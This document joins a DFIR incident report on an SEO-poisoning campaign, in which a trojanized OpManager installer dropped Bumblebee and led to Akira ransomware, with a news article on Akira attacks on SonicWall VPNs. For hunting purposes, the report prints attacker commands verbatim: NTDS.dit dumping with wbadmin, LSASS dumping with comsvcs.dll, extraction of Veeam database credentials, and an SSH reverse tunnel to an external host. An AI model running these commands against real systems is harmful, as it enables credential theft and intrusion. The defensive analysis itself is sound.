Overview Bumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was first reported as using SEO poisoning as a delivery mechanism. Recently in May of 2025 Cyjax reported on a campaign using this method again, impersonating various IT tools. We observed a similar campaign in July in which a download of an IT management tool ended with Akira ransomware. In July 2025, we observed a threat actor compromise an organization through this SEO poisoning campaign. A user searching for “ManageEngine OpManager” was directed to a malicious website, which delivered a trojanized software installer. This action led to the deployment of the Bumblebee malware, granting the threat actor initial access to the environment. The intrusion quickly escalated from a single infected host to a full-scale network compromise. Following initial access, the threat actor moved laterally to a domain controller, dumped credentials, installed persistent remote access tools, and exfiltrated data using an SFTP client. The intrusion culminated in the deployment of Akira ransomware across the root domain. The threat actor returned two days later to repeat the process, encrypting systems within a child domain and causing significant operational disruption across the enterprise. This campaign affected multiple organizations during July as we received confirmation of a similar intrusion responded to by the Swisscom B2B CSIRT in which a malicious IT tool dropped Bumblebee and also ended with Akira ransomware deployment. Our customers received notice of this campaign in early July followed by a private threat brief report. If you are interested in the full report or additional IOCs please contact us. Private Threat Briefs: 20+ private DFIR reports annually. Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc. All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights reports, long-term tracking, data clustering, and other curated intel. Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples. DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds. Contact us today for pricing or a demo! This intrusion began when a user, searching for “ManageEngine OpManager” on Bing, was directed to the malicious site opmanager[.]pro. The user downloaded a trojanized MSI installer, ManageEngine-OpManager.msi, which, upon execution, installed the legitimate software while simultaneously loading the Bumblebee malware msimg32.dll via consent.exe. The Bumblebee malware established command and control (C2) with 109.205.195[.]211:443 and 188.40.187[.]145:443 using DGA domains. By targeting IT management tools and software in both our intrusion and the one observed by Swisscom B2B CSIRT, the users executing the malware were highly privileged IT administrator accounts within Active Directory. This provided easy privileged access to the threat actors for their next actions. Approximately five hours after this initial execution, Bumblebee deployed an AdaptixC2 beacon (AdgNsy.exe), which established a new C2 channel to 172.96.137[.]160:443. The threat actor then initiated internal reconnaissance using built-in Windows utilities, including systeminfo, nltest /dclist:, whoami /groups, and net group domain admins /dom. Following this, the threat actor then created two new domain accounts, backup_DA and backup_EA, and added the latter to the “Enterprise Administrators” group. Using the privileged backup_EA account, the threat actor connected to a domain controller via RDP and dumped the NTDS.dit file using wbadmin.exe. wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include":C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY" -quiet For persistence and re-entry, the threat actor installed the RustDesk remote access tool on several hosts. In a subsequent session, the threat actor established a SSH tunnel to an external server at 193.242.184[.]150 to proxy their activity. ssh [email protected] -R *:10400 -p22 They continued discovery by deploying a renamed SoftPerfect network scanner (n.exe). Following this, they targeted a backup server, and attempted to dump credentials from the Veeam PostgreSQL database. psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials" Around the same time, the threat actor installed FileZilla on a file server and exfiltrated data via SFTP to 185.174.100[.]203. They performed LSASS memory dumping on multiple workstations using rundll32.exe with comsvcs.dll using a combination of remote services and WMI. The threat actor then deployed the Akira ransomware payload, locker.exe, and executed it with various command-line options to encrypt local, remote network shares, and other directories on remote hosts. Two days after this first ransomware deployment, the threat actor returned via RustDesk, connected to a child domain controller, and performed another round of discovery using Invoke-ShareFinder and DNS zone export commands, before deploying Akira ransomware to the child domain. Time to the first round of ransomware (TTR) was just shy of 44 hours after initial access. Swisscom B2B CSIRT reported an even faster TTR of just nine hours from initial access. During our investigation of the OpManager site, we identified two additional websites that appear to be distributing trojanized installers for Axis Camera tools and Angry IP Scanner. Refer to the IOC section for further details. Detection Engineering and Threat Hunting (DEATH) Hunt for MSI installations from user directories followed by suspicious child processes: Monitor msiexec.exe executing from user Desktop/Downloads (C:\Users\*\Desktop\*.msi, C:\ProgramData\*.msi) and spawning unexpected children like consent.exe or unusual image load events for msimg32.dll. Review unusual MSI packages with suspicious names: Look for MSI files with generic names like ManageEngine-OpManager.msi or rustdesk-*.msi downloaded to user directories. Is this software generally allowed in you environment? Is this a commonly used remote access tool for your users? Does the software being installed make sense for the users job role? Credential Access Hunt for LSASS memory dumping via comsvcs.dll with tasklist enumeration: cmd.exe /Q /c for /f "tokens=1,2 delims= " %%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 %%B \Windows\Temp\*.* full Detect LSASS dumps with unusual file extensions: Monitor rundll32.exe comsvcs.dll #+000024 writing to \Windows\Temp\ with non-standard extensions like .sys, .docx, .avhdx Monitor PostgreSQL credential extraction from Veeam databases: psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials" Monitor wbadmin abuse for NTDS.dit/Hive dumping: wbadmin start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include:"C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY" -quiet Discovery Hunt for rapid domain enumeration sequences within short time-frames ( -R *:10400 -p22 Hunt for Bumblebee DGA patterns: Look for multiple DNS queries to domains matching pattern [8-14 random chars].org (e.g., ev2sirbd269o5j[.]org, ijt0l3i8brit6q[.]org) within seconds of each other. Lateral Movement Hunt for RDP logons using newly created accounts: Monitor Type 10 logons from compromised internal systems using accounts like backup_EA Detect suspicious inter-system authentication patterns: Look for authentication from initial access systems to domain controllers within hours of account creation Data Collection & Exfiltration Hunt for FileZilla installation on servers followed by large outbound transfers: Detect FileZilla_*_setup.exe execution on server systems, especially when followed by significant network traffic Look for data staging in ProgramData: Monitor file writes to C:\ProgramData\shares.txt, C:\ProgramData\*.txt containing reconnaissance output Defense Evasion Detect case variation in command execution: Hunt for mixed-case command invocations like Cmd.eXE, CmD.Exe which may indicate evasion attempts Behavioral Correlation Rules Multi-stage attack progression: Alert when a single system exhibits: MSI installation → discovery commands → credential access → lateral movement within 24 hours Cross-system activity correlation: Hunt for accounts created on one system and immediately used for authentication on another (<= 5mins) Tool deployment patterns: Monitor for remote access tool installation (RustDesk) followed by SSH tunneling activity from the same network segment Indicators of Compromise (IOCs) Domains: ev2sirbd269o5j.org (Bumblebee DGA domain) 2rxyt9urhq0bgj.org (Bumblebee DGA domain) DFIR Report: opmanager[.]pro (Malicious site for trojanized installer) angryipscanner.org (Malicious site for trojanized installer) axiscamerastation.org (Malicious site for trojanized installer) Swisscom B2B CSIRT: ip-scanner[.]org (Malicious site for trojanized installer) IP Addresses: 109.205.195[.]211 (Bumblebee C2) 188.40.187[.]145 (Bumblebee C2) DFIR Report: 172.96.137[.]160 (AdaptixC2 C2) Swisscom B2B CSIRT: 170.130.55[.]223 (AdaptixC2 C2) DFIR Report: 193.242.184[.]150 (SSH Tunnel Host) Swisscom B2B CSIRT: 83.229.17[.]60 (SSH Tunnel Host) 185.174.100[.]203 (SFTP Exfiltration Server) File Hashes: DFIR Report: ManageEngine-OpManager.msi 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da (Malicious installer) Swisscom B2B CSIRT: Advanced-IP-Scanner.msi a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2 (Malicious installer) DFIR Report: msimg32.dll a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 (Bumblebee) Swisscom B2B CSIRT: msimg32.dll 6ba5d96e52734cbb9246bcc3decf127f780d48fa11587a1a44880c1f04404d23 (Bumblebee) DFIR Report: locker.exe de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d (Akira ransomware) Swisscom B2B CSIRT: win.exe 18b8e6762afd29a09becae283083c74a19fc09db1f2c3412c42f1b0178bc122a (Akira ransomware) #TB36726
thedfirreport.comAug 5, 2025extracted
SonicWall Investigating Potential SSL VPN Zero-Day After 20+ Targeted Attacks Reported
SonicWall said it's actively investigating reports to determine if there is a new zero-day vulnerability following reports of a spike in Akira ransomware actors in late July 2025. "Over the past 72 hours, there has been a notable increase in both internally and externally reported cyber incidents involving Gen 7 SonicWall firewalls where SSLVPN is enabled," the network security vendor said in a statement Monday. "We are actively investigating these incidents to determine whether they are connected to a previously disclosed vulnerability or if a new vulnerability may be responsible." While SonicWall is digging deeper, organizations using Gen 7 SonicWall firewalls are advised to follow the steps below until further notice - Disable SSL VPN services where practical Limit SSL VPN connectivity to trusted IP addresses Activate services such as Botnet Protection and Geo-IP Filtering Enforce multi-factor authentication Remove inactive or unused local user accounts on the firewall, particularly those with SSL VPN access Encourage regular password updates across all user accounts "VPNs are a requirement for many organizations for their employees to access the corporate network, so expecting every customer to disable the service is not viable, but it is the only current way to halt the malicious activity against these devices," Satnam Narang, senior staff research engineer at Tenable, said. "While the list of additional security actions organizations can take are valuable in lieu of disabling the VPN, it is highly advised that organizations initiate incident response to determine their exposure." The development comes shortly after Arctic Wolf revealed it had identified a surge in Akira ransomware activity targeting SonicWall SSL VPN devices for initial access since late last month. Huntress, in a follow-up analysis published Monday, also said it has observed threat actors pivoting directly to domain controllers merely a few hours after the initial breach. Attack chains commence with the breach of the SonicWall appliance, followed by the attackers taking a "well-worn" post-exploitation path to conduct enumeration, detection evasion, lateral movement, and credential theft. The incidents also involve the bad actors methodically disabling Microsoft Defender Antivirus and deleting volume shadow copies prior to deploying Akira ransomware. Huntress said it detected around 20 different attacks tied to the latest attack wave starting on July 25, 2025, with variations observed in the tradecraft used to pull them off, including in the use of tools for reconnaissance and persistence, such as AnyDesk, ScreenConnect, or SSH. In a statement shared with The Hacker News, the company said all the identified incidents were related to Akira ransomware, although there were instances where the attackers did not succeed in their efforts. "Some may have not been successful in fully encrypting the targets, but they gained access and would have most likely tried to encrypt the environment if they had been given the chance," Huntress said. "We know that these actors were Akira related because they operated similarly to what we've seen from them in the past, or there were readme files, or executables directly linking them." There is evidence to suggest that the activity may be limited to TZ and NSa-series SonicWall firewalls with SSL VPN enabled, and that the suspected flaw exists in firmware versions 7.2.0-7015 and earlier. "The speed and success of these attacks, even against environments with MFA enabled, strongly suggest a zero-day vulnerability is being exploited in the wild," the cybersecurity company said. "This is a critical, ongoing threat." Update In a report published August 5, 2025, GuidePoint Security disclosed that the Akira ransomware actors have leveraged two Windows drivers, rwdrv.sys, a legitimate driver for a Windows performance tuning utility called ThrottleStop, and hlpdrv.sys, as part of a Bring Your Own Vulnerable Driver (BYOVD) exploitation chain to disarm antivirus (AV) solutions. "We have observed Akira affiliates registering [rwdrv.sys] as a service and we assess that this driver is used to gain kernel-level access to the impacted device," Jason Baker said. "The second driver, hlpdrv.sys, is similarly registered as a service. When executed, it modifies the DisableAntiSpyware settings of Windows Defender within \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware. The malware accomplishes this via execution of regedit.exe." GuidePoint also theorized that the legitimate rwdrv.sys driver may have been utilized by the attackers to facilitate the execution of hlpdrv.sys. However, the exact mechanism used to pull this off remains unknown. Interestingly, another driver associated with ThrottleStop ("ThrottleBlood.sys") has also been abused in the wild to kill antivirus software via BYOVD attack and execute MedusaLocker ransomware. The malicious artifact used to pull this off has been detected in the wild since October 2024. "The adversary gained access to the initial system, an SMTP server, through a valid RDP credential," Kaspersky said. "They then extracted other users' credentials with Mimikatz and performed lateral movement using the pass-the-hash technique. The attacker achieved their objective by disabling the AV in place on various endpoints and servers across the network and executing a variant of the MedusaLocker ransomware." In recent months, Akira ransomware infections have also been propagated via search engine optimization (SEO) poisoning techniques, with searches for IT management tools like "ManageEngine OpManager" on Microsoft Bing leading users to bogus sites that deliver a trojanized installer, which then drops the Bumblebee malware loader. The initial access afforded by the malware is leveraged for initial reconnaissance and the deployment of a legitimate post-exploitation and adversarial emulation framework called AdaptixC2 for persistent remote access. "Following initial access, the threat actor moved laterally to a domain controller, dumped credentials, installed persistent remote access tools, and exfiltrated data using an SFTP client," The DFIR Report said. "The intrusion culminated in the deployment of Akira ransomware across the root domain." (The story was updated after publication to include insights from The DFIR Report, GuidePoint Security, Huntress, Kaspersky, and Tenable.)
thehackernews.comAug 5, 2025extracted